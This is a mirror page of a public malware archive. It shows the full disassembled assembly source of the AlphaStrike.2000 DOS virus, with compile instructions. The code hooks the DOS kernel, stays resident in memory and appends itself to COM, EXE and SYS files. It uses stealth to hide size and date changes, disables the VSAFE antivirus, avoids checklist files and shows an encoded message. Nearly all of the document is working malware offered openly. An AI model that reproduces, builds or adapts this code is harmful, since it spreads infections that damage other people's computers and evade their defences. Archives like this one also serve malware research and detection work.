mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
891 lines
20 KiB
NASM
891 lines
20 KiB
NASM
|
; AlphaStrike.2000 or whatever its called by Neurobasher. disasm by retch.
|
||
|
; there are no comments. there are no need for comments unless you are lame.
|
||
|
;
|
||
|
; GREETZ R LAYME SO I WEEL NOT DO NE.
|
||
|
;
|
||
|
; 2 COMPYLE:
|
||
|
; tasm /m alpha.asm (EYE UZED FORE DOT SOMETHING)
|
||
|
; tlink alpha.obj (umm... 2.xx)
|
||
|
; exe2bin alpha.exe alpha.com
|
||
|
;
|
||
|
; i am contactable via retro@pcscav.com
|
||
|
|
||
|
.model tiny
|
||
|
.code
|
||
|
.286
|
||
|
|
||
|
virus_start: mov di, 0F242h
|
||
|
mov si, word ptr ds:[2h]
|
||
|
sub si, di
|
||
|
cmp si, 1000h
|
||
|
call getip
|
||
|
getip: mov bp, sp
|
||
|
mov bp, [bp]
|
||
|
cld
|
||
|
mov ax, 4458h
|
||
|
int 21h
|
||
|
jb checkifdosinhma
|
||
|
mov ds, es:[bx+0Eh]
|
||
|
mov si, 0Bh
|
||
|
jmp addressatSI
|
||
|
sysentry: pushf
|
||
|
pusha
|
||
|
push ds
|
||
|
push es
|
||
|
jmp virus_start
|
||
|
checkifdosinhma:mov ax, 3306h
|
||
|
int 21h
|
||
|
cmp al, 6
|
||
|
jnz checkdosversion
|
||
|
cmp dh, 10h
|
||
|
jnz go_abortinstall
|
||
|
mov ax, 0FFC4h
|
||
|
jmp compareints
|
||
|
checkdosversion:mov ah, 30h
|
||
|
int 21h
|
||
|
xchg al, ah
|
||
|
cmp ax, 31Eh
|
||
|
mov ax, 1Bh
|
||
|
jb go_abortinstall
|
||
|
compareints: mov cx, 0Ah
|
||
|
mov ds, cx
|
||
|
mov es, cx
|
||
|
mov si, 14h
|
||
|
mov bx, si
|
||
|
lea di, [bx+si]
|
||
|
cmpsw
|
||
|
jnz abortinstall
|
||
|
cmpsw
|
||
|
go_abortinstall:jnz abortinstall
|
||
|
lds si, [bx]
|
||
|
add si, ax
|
||
|
cmp al, 1Bh
|
||
|
jz checkifkernelpatched
|
||
|
mov si, [si+8]
|
||
|
addressatSI: lds si, [si]
|
||
|
checkifkernelpatched:
|
||
|
cmp byte ptr [si], 0EAh
|
||
|
jz abortinstall
|
||
|
mov cs:[bp+(kernaladdress )-getip], si
|
||
|
mov cs:[bp+(kernaladdress+2)-getip], ds
|
||
|
call getmemory
|
||
|
jnz abortinstall
|
||
|
lea si, [bp+(virus_start)-getip]
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov es, cx
|
||
|
mov cx, offset header
|
||
|
rep movsb
|
||
|
sub ax, ax
|
||
|
mov cl, 0C0h
|
||
|
rep stosb
|
||
|
mov di, offset newint21
|
||
|
mov es:[di+1], al
|
||
|
lds si, ds:[bp+(kernaladdress)-getip]
|
||
|
mov ax, [si]
|
||
|
mov cl, 6Ch
|
||
|
mov bx, 6
|
||
|
cmp al, 0FAh
|
||
|
jz patchkernel
|
||
|
mov bl, 7
|
||
|
cmp al, 2Eh
|
||
|
jz patchkernel
|
||
|
mov cl, 69h
|
||
|
mov bl, 5
|
||
|
cmp al, 80h
|
||
|
jnz abortinstall
|
||
|
patchkernel: mov es:[di+savecmp-newint21], cl
|
||
|
add bx, si
|
||
|
mov es:[di+kernaladdress-newint21], bx
|
||
|
mov byte ptr [si], 0EAh
|
||
|
mov [si+1], di
|
||
|
mov [si+3], es
|
||
|
abortinstall: pop ax
|
||
|
sub si, si
|
||
|
mov ax, ss
|
||
|
cmp ah, 90h
|
||
|
jz restoresys
|
||
|
mov ah, 62h
|
||
|
int 21h
|
||
|
push bx
|
||
|
mov ds, bx
|
||
|
mov cx, [si+2Ch]
|
||
|
jcxz restorehost
|
||
|
mov ds, cx
|
||
|
mov ch, 8
|
||
|
findcomspec: cmp word ptr [si], 4F43h
|
||
|
jnz keeplooking
|
||
|
cmp word ptr [si+6], 3D43h
|
||
|
jz foundcomspec
|
||
|
keeplooking: inc si
|
||
|
loop findcomspec
|
||
|
jmp restorehost
|
||
|
foundcomspec: mov ax, 3D00h
|
||
|
lea dx, [si+8]
|
||
|
int 21h
|
||
|
xchg ax, bx
|
||
|
mov ah, 3Eh
|
||
|
int 21h
|
||
|
restorehost: pop ax
|
||
|
mov ds, ax
|
||
|
mov es, ax
|
||
|
add ax, 10h
|
||
|
mov bx, ax
|
||
|
db 81h,0C3h
|
||
|
savess dw 0FFF0h
|
||
|
cli
|
||
|
db 0BCh
|
||
|
savesp dw 0FFFEh
|
||
|
mov ss, bx
|
||
|
db 5
|
||
|
savecs dw 0FFF0h
|
||
|
mov cs:[bp+jumpsegment-getip], ax
|
||
|
cmp sp, 0FFFEh
|
||
|
jnz zeroregs
|
||
|
mov word ptr ds:100h, 20CDh
|
||
|
first2 = $-2
|
||
|
mov byte ptr ds:102h, 90h
|
||
|
next1 = $-1
|
||
|
zeroregs: sub ax, ax
|
||
|
sub bx, bx
|
||
|
sub cx, cx
|
||
|
cwd
|
||
|
sub si, si
|
||
|
sub di, di
|
||
|
sub bp, bp
|
||
|
sti
|
||
|
jmp near ptr jumptohost
|
||
|
db 0EAh
|
||
|
jumptohost db 0EAh
|
||
|
saveip dw 100h
|
||
|
jumpsegment dw 0
|
||
|
restoresys: pop es
|
||
|
pop ds
|
||
|
mov word ptr [si+8], 0
|
||
|
sysret2 = $-2
|
||
|
popa
|
||
|
popf
|
||
|
db 68h
|
||
|
sysret dw 0
|
||
|
ret
|
||
|
getmemory: call getlastmcb
|
||
|
mov ax, ds
|
||
|
mov bx, [si+3]
|
||
|
sub bx, dx
|
||
|
add ax, bx
|
||
|
xchg ax, cx
|
||
|
xchg ax, bx
|
||
|
jmp setnewmcbsize
|
||
|
setlastmcbsize: call getlastmcb
|
||
|
dec ax ; ax=cs
|
||
|
mov cx, ax ; cx=ax
|
||
|
sublastmcbseg: sub ax, bx ; ax=ax-lastmcbseg
|
||
|
setnewmcbsize: dec ax
|
||
|
or di, di
|
||
|
jnz dontsetmcbsize
|
||
|
mov [si+3], ax
|
||
|
dontsetmcbsize: ret
|
||
|
modifytomseginpsp:
|
||
|
mov ah, 62h
|
||
|
int 21h
|
||
|
mov ds, bx
|
||
|
int 12h
|
||
|
shl ax, 6
|
||
|
sub ax, 87h
|
||
|
mov ds:2, ax
|
||
|
hideourmem: call getlastmcb
|
||
|
add ax, dx ; ax=virusparasize+virusseg+1
|
||
|
jmp sublastmcbseg
|
||
|
getlastmcb: push es
|
||
|
mov ah, 52h
|
||
|
int 21h
|
||
|
mov ds, es:[bx-2]
|
||
|
mov ax, 5802h
|
||
|
int 21h
|
||
|
cbw
|
||
|
push ax
|
||
|
mov ax, 5803h
|
||
|
mov bx, 1
|
||
|
int 21h ; set umb's as part of chain
|
||
|
sub si, si
|
||
|
mov di, si
|
||
|
getlastmcbloop: call getnextmcb
|
||
|
jnz getlastmcbloop
|
||
|
pop bx
|
||
|
push ax
|
||
|
mov ax, 5803h
|
||
|
int 21h
|
||
|
pop bx
|
||
|
pop es
|
||
|
mov ax, cs
|
||
|
inc ax
|
||
|
mov dx, 87h ; 2160d / 10h
|
||
|
ret
|
||
|
getnextmcb: cmp word ptr [si+10h], 20CDh
|
||
|
jnz checkiflast
|
||
|
cmp byte ptr [si+15h], 0EAh
|
||
|
jnz checkiflast
|
||
|
inc di
|
||
|
checkiflast: cmp byte ptr [si], 5Ah ; 'Z'
|
||
|
jz islastblock
|
||
|
mov ax, ds
|
||
|
inc ax
|
||
|
add ax, [si+3]
|
||
|
mov ds, ax
|
||
|
islastblock: ret
|
||
|
newint21: db 0EBh
|
||
|
virusactive db 4Ch
|
||
|
mov cs:saveds, ds
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov savedi, di
|
||
|
mov di, offset saveds
|
||
|
mov byte ptr [di+virusactive-saveds], 4Ch
|
||
|
mov [di+savees-saveds], es
|
||
|
mov [di+saveax-saveds], ax
|
||
|
mov [di+savebx-saveds], bx
|
||
|
mov [di+savecx-saveds], cx
|
||
|
mov [di+savedx-saveds], dx
|
||
|
mov [di+savesi-saveds], si
|
||
|
mov [di+savebp-saveds], bp
|
||
|
push cs
|
||
|
pop es
|
||
|
mov di, offset functions
|
||
|
db 0B9h
|
||
|
stealthmode dw 14h
|
||
|
xchg al, ah
|
||
|
xor al, 5Fh
|
||
|
cld
|
||
|
repne scasb
|
||
|
jnz exithandler
|
||
|
sub di, offset functions+1
|
||
|
shl di, 1
|
||
|
add di, offset functionoffsets
|
||
|
push offset exithandler
|
||
|
push word ptr [di]
|
||
|
jmp near ptr restoreregs
|
||
|
exithandler: call restoreregsandsetvirusactive
|
||
|
emulateoldkernal:
|
||
|
cmp ah, 6Ch
|
||
|
savecmp = $-1
|
||
|
ja zeroal_iret
|
||
|
cli
|
||
|
db 0EAh
|
||
|
kernaladdress dd 0FDC840FEh
|
||
|
writeheader: mov ah, 40h
|
||
|
mov cx, 18h
|
||
|
readwritefromsi:mov dx, si
|
||
|
int21: cli
|
||
|
pushf
|
||
|
call cs:kernaladdress
|
||
|
ret
|
||
|
zeroal_iret: mov al, 0
|
||
|
iret
|
||
|
restoreregsandsetvirusactive:
|
||
|
call near ptr restoreregs
|
||
|
setvirusactive: mov cs:virusactive, 0
|
||
|
ret
|
||
|
memstealth: call setlastmcbsize ; 48h/49h/4Ah
|
||
|
restoreregs: db 0B8h
|
||
|
saveds dw 9850h
|
||
|
mov ds, ax
|
||
|
db 0B8h
|
||
|
savees dw 6D8h
|
||
|
mov es, ax
|
||
|
db 0B8h
|
||
|
saveax dw 4B00h
|
||
|
db 0BBh
|
||
|
savebx dw 241h
|
||
|
db 0B9h
|
||
|
savecx dw 209h
|
||
|
db 0BAh
|
||
|
savedx dw 40E6h
|
||
|
db 0BEh
|
||
|
savesi dw 0E4h
|
||
|
db 0BFh
|
||
|
savedi dw 0
|
||
|
db 0BDh
|
||
|
savebp dw 6914h
|
||
|
ret
|
||
|
loc_0_272: mov dx, 3F5h
|
||
|
mov al, 4
|
||
|
mov ch, 4
|
||
|
out dx, al
|
||
|
loop $
|
||
|
mov ch, 4
|
||
|
out dx, al
|
||
|
loop $
|
||
|
in al, dx
|
||
|
test al, 40h
|
||
|
ret
|
||
|
message db 002h,0E0h,052h,0BFh,0B4h,0B0h,0B8h,0BFh,0E0h,0ADh
|
||
|
db 0ACh,0AEh,0B7h,0B5h,0BBh,051h,0E0h,007h,0E0h,0BFh
|
||
|
db 09Ch,08Ah,09Fh,092h,09Dh,09Bh,09Ch,0E0h,0ACh,09Fh
|
||
|
db 09Dh,08Ch,097h,09Dh,09Fh,094h,0E0h,0AAh,097h,08Eh
|
||
|
db 09Fh,094h,0E0h,0B7h,093h,090h,094h,09Fh,092h,08Ch
|
||
|
db 0E0h,09Eh,087h,0E0h,0B2h,0BBh,0ABh,0AEh,0B1h,0BEh
|
||
|
db 0BFh,0ADh,0B8h,0BBh,0AEh,0D9h,0C7h,0CDh,0E0h,0D1h
|
||
|
db 0E0h,0B9h,09Bh,08Eh,093h,09Fh,092h,087h,0E0h,002h
|
||
|
setnofilestealth:
|
||
|
mov byte ptr cs:stealthmode, 12h
|
||
|
activate: ret
|
||
|
call clearscreen
|
||
|
mov ah, 2
|
||
|
mov bh, 0
|
||
|
mov dx, 0C00h
|
||
|
int 10h
|
||
|
mov si, offset message
|
||
|
mov cx, 4Eh
|
||
|
displayloop: lods byte ptr cs:[si]
|
||
|
neg al
|
||
|
int 29h
|
||
|
loop displayloop
|
||
|
xor ax, ax
|
||
|
int 16h
|
||
|
clearscreen: mov ax, 3
|
||
|
int 10h
|
||
|
setnoactivate: mov byte ptr cs:activate, 0C3h
|
||
|
ret
|
||
|
execute: call setfullstealth
|
||
|
call setnoactivate
|
||
|
cmp al, 1
|
||
|
mov al, 90h
|
||
|
call setdirstealth
|
||
|
jnz infectdx
|
||
|
mov ax, 3D02h
|
||
|
int 21h
|
||
|
jb ret3
|
||
|
xchg ax, bx
|
||
|
call disinfecthandle
|
||
|
mov ah, 3Eh
|
||
|
int 21h
|
||
|
mov byte ptr ds:activate, 90h
|
||
|
ret3: ret
|
||
|
infectsi: mov dx, si
|
||
|
infectdx: cmp ax, 4300h
|
||
|
jz ret3
|
||
|
call sethandletozero
|
||
|
cmp ah, 3Dh
|
||
|
jnz dontsetfullstealth
|
||
|
call setfullstealth
|
||
|
dontsetfullstealth:
|
||
|
mov si, dx
|
||
|
mov di, offset buffer
|
||
|
push cs
|
||
|
pop es
|
||
|
copyname: lodsb
|
||
|
or al, al
|
||
|
jz namecopied
|
||
|
stosb
|
||
|
jmp copyname
|
||
|
namecopied: stosb
|
||
|
mov cl, byte ptr cs:saveax+1
|
||
|
mov ax, [si-7]
|
||
|
mov bx, [si-0Bh]
|
||
|
cmp cl, 3Dh
|
||
|
jnz notopen
|
||
|
db 0EBh
|
||
|
dontopenchklist db 16h
|
||
|
cmp ax, 5453h ; chkliST?
|
||
|
jnz notopen
|
||
|
cmp bx, 4B48h ; cHKlist?
|
||
|
jnz notopen
|
||
|
pop ax
|
||
|
call restoreregsandsetvirusactive
|
||
|
mov ax, 2
|
||
|
stc
|
||
|
retf 2
|
||
|
notopen: cmp cl, 4Bh
|
||
|
jnz checkifavactive
|
||
|
mov cl, 16h
|
||
|
cmp ax, 5641h
|
||
|
jnz notmsavorcpav
|
||
|
mov cl, 0
|
||
|
notmsavorcpav: mov cs:dontopenchklist, cl
|
||
|
cmp bx, 5343h
|
||
|
jz setmemstealthonly
|
||
|
cmp bx, 4142h
|
||
|
jz setmemstealthonly
|
||
|
cmp ax, 4148h
|
||
|
jz setmemstealthonly
|
||
|
cmp ax, 4A52h
|
||
|
jz setmemstealthonly
|
||
|
cmp word ptr [si-8], 495Ah
|
||
|
jnz leavestealthmode
|
||
|
setmemstealthonly:
|
||
|
mov byte ptr cs:stealthmode, 8
|
||
|
leavestealthmode:
|
||
|
push ax
|
||
|
mov ax, 160Ah
|
||
|
int 2Fh
|
||
|
cmp al, 0Ah
|
||
|
pop ax
|
||
|
jnz checkifavactive
|
||
|
cmp ax, 5641h
|
||
|
jz checkifavactive
|
||
|
cmp bx, 544Eh
|
||
|
jz checkifavactive
|
||
|
call hideourmem
|
||
|
checkifavactive:
|
||
|
mov bx, 0FF0Fh
|
||
|
xchg ax, bx
|
||
|
int 21h
|
||
|
cmp al, 1
|
||
|
jz ret4
|
||
|
mov bl, 0
|
||
|
call vsafe
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov ah, 2Fh
|
||
|
int 21h
|
||
|
push es
|
||
|
push bx
|
||
|
mov ah, 1Ah
|
||
|
mov dx, offset tempdta
|
||
|
int 21h
|
||
|
mov ax, 3524h
|
||
|
int 21h
|
||
|
push es
|
||
|
push bx
|
||
|
mov ah, 25h
|
||
|
mov dx, offset zeroal_iret
|
||
|
int 21h
|
||
|
mov ah, 4Eh
|
||
|
mov cl, 27h
|
||
|
call setdxtobuffer_int21
|
||
|
jb restoreint24anddta
|
||
|
mov si, offset header
|
||
|
sub di, di
|
||
|
mov al, [si+18h]
|
||
|
mov attribs, al
|
||
|
cmp byte ptr [si], 2
|
||
|
ja notdriveAorB
|
||
|
call loc_0_272
|
||
|
jz checkfiletype
|
||
|
restoreint24anddta:
|
||
|
mov ax, 2524h
|
||
|
pop dx
|
||
|
pop ds
|
||
|
int 21h
|
||
|
mov ah, 1Ah
|
||
|
pop dx
|
||
|
pop ds
|
||
|
int 21h
|
||
|
togglevsafe db 0B3h
|
||
|
vsafestatus db 16h
|
||
|
vsafe: mov ax, 0FA02h
|
||
|
mov dx, 5945h
|
||
|
int 16h
|
||
|
mov cs:vsafestatus, cl
|
||
|
ret4: ret
|
||
|
notdriveAorB: cmp [si+12h], di
|
||
|
jnz checkfiletype
|
||
|
cmp word ptr [si+10h], 2
|
||
|
jb restoreint24anddta
|
||
|
cmp byte ptr [si], 3
|
||
|
jb checkfiletype
|
||
|
mov ah, 2Ah
|
||
|
int 21h
|
||
|
sub cx, 7BCh
|
||
|
mov ax, [si+1Bh]
|
||
|
shr ax, 1
|
||
|
cmp ah, cl
|
||
|
jnz checkfiletype
|
||
|
shr ax, 4
|
||
|
and al, 0Fh
|
||
|
cmp al, dh
|
||
|
jz restoreint24anddta
|
||
|
checkfiletype: mov bp, offset setcarry_ret
|
||
|
cmp word ptr [si+21h], 4254h ; TB*
|
||
|
jz restoreint24anddta
|
||
|
cmp word ptr [si+0Ch], 4F43h ; CO
|
||
|
jnz notcominfection
|
||
|
mov bp, offset infectcom
|
||
|
notcominfection:cmp word ptr [si+1Eh], 0Bh
|
||
|
jb restoreint24anddta
|
||
|
cmp byte ptr [si+1Ch], 0C8h
|
||
|
jnb restoreint24anddta
|
||
|
mov al, [si+18h]
|
||
|
and al, 7
|
||
|
jz attributesok
|
||
|
sub cx, cx
|
||
|
call setattribs
|
||
|
jb restoreint24anddta
|
||
|
attributesok: mov ax, 3D02h
|
||
|
call setdxtobuffer_int21
|
||
|
jb near ptr restoreattribs
|
||
|
xchg ax, bx
|
||
|
mov ah, 3Fh
|
||
|
mov cx, 19h
|
||
|
call readwritefromsi
|
||
|
mov ax, [si]
|
||
|
xchg al, ah
|
||
|
cmp ax, 4D5Ah
|
||
|
jnz notexeinfection
|
||
|
mov bp, offset infectexe
|
||
|
jmp notsysinfection
|
||
|
notexeinfection:cmp ax, 0FFFFh
|
||
|
jnz notsysinfection
|
||
|
mov bp, offset infectsys
|
||
|
notsysinfection:call bp
|
||
|
jb dontwriteheader
|
||
|
call writeheader
|
||
|
dontwriteheader:mov ax, 5700h
|
||
|
mov cx, [si+19h]
|
||
|
mov dx, [si+1Bh]
|
||
|
inc ax
|
||
|
int 21h
|
||
|
mov ah, 3Eh
|
||
|
int 21h
|
||
|
restoreattribs db 0B1h
|
||
|
attribs db 20h
|
||
|
call setattribs
|
||
|
jmp restoreint24anddta
|
||
|
setattribs: mov ax, 4301h
|
||
|
setdxtobuffer_int21:
|
||
|
mov ch, 0
|
||
|
mov dx, offset buffer
|
||
|
jmp int21
|
||
|
infectexe: cmp byte ptr [si+18h], 40h ;WINDOZE EXE ?
|
||
|
jz setcarry_ret
|
||
|
mov ax, [si+4]
|
||
|
dec ax
|
||
|
mov cx, 200h
|
||
|
mul cx
|
||
|
add ax, [si+2]
|
||
|
adc dx, di
|
||
|
cmp [si+1Dh], ax
|
||
|
jnz setcarry_ret
|
||
|
cmp [si+1Fh], dx
|
||
|
jz nointernaloverlays
|
||
|
setcarry_ret: stc
|
||
|
ret
|
||
|
nointernaloverlays:
|
||
|
mov ax, [si+0Eh]
|
||
|
mov ds:savess, ax
|
||
|
mov ax, [si+10h]
|
||
|
mov ds:savesp, ax
|
||
|
mov ax, [si+16h]
|
||
|
mov ds:savecs, ax
|
||
|
mov ax, [si+14h]
|
||
|
mov ds:saveip, ax
|
||
|
call appendvirus
|
||
|
jb exitinfectexe
|
||
|
mov ax, [si+8]
|
||
|
mov cl, 10h
|
||
|
mul cx
|
||
|
neg ax
|
||
|
not dx
|
||
|
add ax, [si+1Dh]
|
||
|
adc dx, di
|
||
|
add dx, [si+1Fh]
|
||
|
div cx
|
||
|
mov [si+16h], ax
|
||
|
mov [si+14h], dx
|
||
|
dec ax
|
||
|
mov [si+0Eh], ax
|
||
|
mov word ptr [si+10h], 9D2h
|
||
|
add word ptr [si+0Ah], 0ADh
|
||
|
mov ax, [si+1Dh]
|
||
|
mov dx, [si+1Fh]
|
||
|
add ax, virussize
|
||
|
adc dx, di
|
||
|
mov cx, 200h
|
||
|
div cx
|
||
|
inc ax
|
||
|
mov [si+4], ax
|
||
|
mov [si+2], dx
|
||
|
clc
|
||
|
exitinfectexe: ret
|
||
|
infectcom: cmp word ptr [si+1Eh], 0D6h
|
||
|
ja exitcominfect
|
||
|
mov ax, [si]
|
||
|
mov word ptr ds:first2, ax
|
||
|
mov al, [si+2]
|
||
|
mov byte ptr ds:next1, al
|
||
|
mov ax, 0FFF0h
|
||
|
mov ds:savecs, ax
|
||
|
mov ds:savess, ax
|
||
|
mov word ptr ds:saveip, 100h
|
||
|
mov word ptr ds:savesp, 0FFFEh
|
||
|
call appendvirus
|
||
|
jb exitcominfect
|
||
|
mov byte ptr [si], 0E9h
|
||
|
mov ax, -3 ;0FFFDh
|
||
|
add ax, [si+1Dh]
|
||
|
mov [si+1], ax
|
||
|
clc
|
||
|
exitcominfect: ret
|
||
|
infectsys: mov ax, [si+8]
|
||
|
mov word ptr ds:sysret, ax
|
||
|
mov word ptr ds:sysret2, ax
|
||
|
call appendvirus
|
||
|
jb ret5
|
||
|
mov ax, [si+1Dh]
|
||
|
add ax, offset sysentry
|
||
|
mov [si+8], ax
|
||
|
clc
|
||
|
ret5: ret
|
||
|
appendvirus: mov al, 2
|
||
|
call lseek
|
||
|
mov ah, 40h
|
||
|
mov cx, virussize
|
||
|
cwd
|
||
|
call int21
|
||
|
cmp ax, cx
|
||
|
stc
|
||
|
jnz ret1
|
||
|
add byte ptr [si+1Ch], 0C8h
|
||
|
lseekstart: mov al, 0
|
||
|
lseek: mov ah, 42h
|
||
|
cwd
|
||
|
mov cx, dx
|
||
|
doint21: int 21h
|
||
|
ret1: ret
|
||
|
lseekbeforeend: mov ax, 4202h
|
||
|
mov cx, 0FFFFh
|
||
|
jmp doint21
|
||
|
checkhandle: cmp bl, 5 ;LAME HANDLE CHEQ.
|
||
|
jb exittimestealth
|
||
|
checkinfection: mov ax, 5700h
|
||
|
int 21h
|
||
|
jb exittimestealth
|
||
|
cmp dh, 0C8h
|
||
|
exittimestealth:ret
|
||
|
blocklseek: cmp al, 2
|
||
|
jnz ret1
|
||
|
call checkinfection
|
||
|
jb ret1
|
||
|
pop ax
|
||
|
call near ptr restoreregs
|
||
|
push cx
|
||
|
sub dx, virussize
|
||
|
sbb cx, 0
|
||
|
int 21h
|
||
|
pop cx
|
||
|
jmp setvirusactive_exit
|
||
|
setnodirstealth:mov al, 0C3h
|
||
|
setdirstealth: mov byte ptr cs:fcbdirstealth, al
|
||
|
ret
|
||
|
fcbdirstealth: nop
|
||
|
inc sp
|
||
|
inc sp
|
||
|
int 21h
|
||
|
cmp al, 0FFh
|
||
|
jz setvirusactive_exit
|
||
|
pushf
|
||
|
push ax
|
||
|
call getdta
|
||
|
cmp byte ptr [bx], 0FFh
|
||
|
jnz notextended
|
||
|
add bx, 7
|
||
|
notextended: cmp [bx+1Ah], al
|
||
|
jb exitdirstealth
|
||
|
sub [bx+1Ah], al
|
||
|
add bx, 3
|
||
|
jmp stealthdirsize
|
||
|
getdta: mov ah, 2Fh
|
||
|
int 21h
|
||
|
mov al, 0C8h
|
||
|
push es
|
||
|
pop ds
|
||
|
ret
|
||
|
asciidirstealth:inc sp
|
||
|
inc sp
|
||
|
int 21h
|
||
|
jb setvirusactive_exit
|
||
|
pushf
|
||
|
push ax
|
||
|
call getdta
|
||
|
cmp [bx+19h], al
|
||
|
jb exitdirstealth
|
||
|
sub [bx+19h], al
|
||
|
stealthdirsize: cmp word ptr [bx+1Bh], 0Bh
|
||
|
jb exitdirstealth
|
||
|
sub word ptr [bx+1Ah], virussize
|
||
|
sbb word ptr [bx+1Ch], 0
|
||
|
exitdirstealth: call restoreregs
|
||
|
pop ax
|
||
|
popf
|
||
|
setvirusactive_exit:
|
||
|
call setvirusactive
|
||
|
jmp exitkeepflags
|
||
|
readoldheader: mov al, 1
|
||
|
call lseek
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov oldposlo, ax
|
||
|
mov oldposhi, dx
|
||
|
mov si, offset header
|
||
|
cmp handle, bl
|
||
|
jz ret0
|
||
|
mov dx, 0FFDFh
|
||
|
call lseekbeforeend
|
||
|
mov ah, 3Fh
|
||
|
mov cx, 21h
|
||
|
call readwritefromsi
|
||
|
mov handle, bl
|
||
|
lseektooldpos: mov ax, 4200h
|
||
|
db 0B9h
|
||
|
oldposhi dw 0
|
||
|
db 0BAh
|
||
|
oldposlo dw 0
|
||
|
int 21h
|
||
|
ret0: ret
|
||
|
disinfecthandle:call checkhandle
|
||
|
jb ret0
|
||
|
push cx
|
||
|
push dx
|
||
|
call readoldheader
|
||
|
call lseekstart
|
||
|
call writeheader
|
||
|
mov dx, 0F830h ; -virussize
|
||
|
call lseekbeforeend
|
||
|
mov ah, 40h
|
||
|
sub cx, cx
|
||
|
int 21h
|
||
|
pop dx
|
||
|
pop cx
|
||
|
sub dh, 0C8h
|
||
|
mov ax, 5701h
|
||
|
int 21h
|
||
|
jmp lseektooldpos
|
||
|
stealthread: mov bp, cx
|
||
|
call checkhandle
|
||
|
jb ret0
|
||
|
pop ax
|
||
|
call readoldheader
|
||
|
sub ax, [si+1Dh]
|
||
|
sbb dx, 0
|
||
|
sub dx, [si+1Fh]
|
||
|
js adjustread
|
||
|
call restoreregsandsetvirusactive
|
||
|
sub ax, ax
|
||
|
clc
|
||
|
exitkeepflags: retf 2
|
||
|
adjustread: add ax, bp
|
||
|
adc dx, 0
|
||
|
jnz bigread
|
||
|
sub bp, ax
|
||
|
bigread: push bp
|
||
|
call near ptr restoreregs
|
||
|
pop cx
|
||
|
int 21h
|
||
|
pushf
|
||
|
push ax
|
||
|
jb exitstealthread
|
||
|
push ds
|
||
|
pop es
|
||
|
mov di, dx
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov si, offset header
|
||
|
cmp oldposhi, 0
|
||
|
jnz exitstealthread
|
||
|
mov ax, oldposlo
|
||
|
cmp ax, 18h
|
||
|
jnb exitstealthread
|
||
|
add si, ax
|
||
|
add cx, ax
|
||
|
cmp cx, 18h
|
||
|
jbe moveit
|
||
|
sub ax, 18h
|
||
|
neg ax
|
||
|
xchg ax, cx
|
||
|
moveit: cld
|
||
|
rep movsb
|
||
|
exitstealthread:call restoreregsandsetvirusactive
|
||
|
pop ax
|
||
|
popf_exitwithflags:
|
||
|
popf
|
||
|
jmp exitkeepflags
|
||
|
gettimestealth: cmp byte ptr cs:stealthmode, 12h
|
||
|
jnz dotimestealth
|
||
|
cmp al, 0
|
||
|
jz ret2
|
||
|
setfullstealth: mov byte ptr cs:stealthmode, 14h
|
||
|
ret
|
||
|
dotimestealth: cmp al, 0
|
||
|
jnz settimestealth
|
||
|
inc sp
|
||
|
inc sp
|
||
|
int 21h
|
||
|
pushf
|
||
|
jb setvirusactive_exit1
|
||
|
call removemarkerfromdh
|
||
|
setvirusactive_exit1:
|
||
|
call setvirusactive
|
||
|
jmp popf_exitwithflags
|
||
|
settimestealth: call setfullstealth
|
||
|
mov ax, 5700h
|
||
|
int 21h
|
||
|
jb ret2
|
||
|
pop ax
|
||
|
cmp dh, 0C8h
|
||
|
call near ptr restoreregs
|
||
|
jb removemarkeranddoint21
|
||
|
cmp dh, 0C8h
|
||
|
jnb doint21andexit
|
||
|
add dh, 0C8h
|
||
|
doint21andexit: int 21h
|
||
|
pushf
|
||
|
jmp setvirusactive_exit1
|
||
|
removemarkeranddoint21:
|
||
|
call removemarkerfromdh
|
||
|
jmp doint21andexit
|
||
|
removemarkerfromdh:
|
||
|
cmp dh, 0C8h
|
||
|
jb notmarked
|
||
|
sub dh, 0C8h
|
||
|
notmarked: ret
|
||
|
sethandletozero:mov cs:handle, 0
|
||
|
ret2: ret
|
||
|
; NOTE : ALL FUNKTIONZ ARE XORED WITH 5Fh
|
||
|
functions db 013h ; 4Ch - prog terminate
|
||
|
db 017h ; 48h - create mem block
|
||
|
db 016h ; 49h - release memory
|
||
|
db 015h ; 4Ah - resize mem block
|
||
|
db 00Dh ; 52h - get SYSVARS
|
||
|
db 0B5h ; 0EAh - ALLOC HUGE SEG
|
||
|
db 06Dh ; 32h - GET DPB
|
||
|
db 014h ; 4Bh - program EXEC
|
||
|
db 062h ; 3Dh - open file
|
||
|
db 04Eh ; 11h - fcb FindFirst
|
||
|
db 04Dh ; 12h - fcb FindNext
|
||
|
db 011h ; 4Eh - ASCII FindFirst
|
||
|
db 010h ; 4Fh - ASCII FindNext
|
||
|
db 008h ; 57h - get/set file time
|
||
|
db 033h ; 6Ch - extended open
|
||
|
db 01Ch ; 43h - get/set attribs
|
||
|
db 061h ; 3Eh - handle close
|
||
|
db 01Fh ; 40h - handle write
|
||
|
db 01Dh ; 42h - lseek
|
||
|
db 060h ; 3Fh - handle read
|
||
|
functionoffsets dw offset setnofilestealth
|
||
|
dw offset memstealth
|
||
|
dw offset memstealth
|
||
|
dw offset memstealth
|
||
|
dw offset hideourmem
|
||
|
dw offset modifytomseginpsp
|
||
|
dw offset setnodirstealth
|
||
|
dw offset execute
|
||
|
dw offset infectdx
|
||
|
dw offset fcbdirstealth
|
||
|
dw offset fcbdirstealth
|
||
|
dw offset asciidirstealth
|
||
|
dw offset asciidirstealth
|
||
|
dw offset gettimestealth
|
||
|
dw offset infectsi
|
||
|
dw offset infectdx
|
||
|
dw offset sethandletozero
|
||
|
dw offset disinfecthandle
|
||
|
dw offset blocklseek
|
||
|
dw offset stealthread
|
||
|
|
||
|
header db 0CDh,020h,090h
|
||
|
tempdta db 3Ch dup (0)
|
||
|
buffer db 80h dup (0)
|
||
|
handle db 0
|
||
|
virussize = 7D0h
|
||
|
end virus_start
|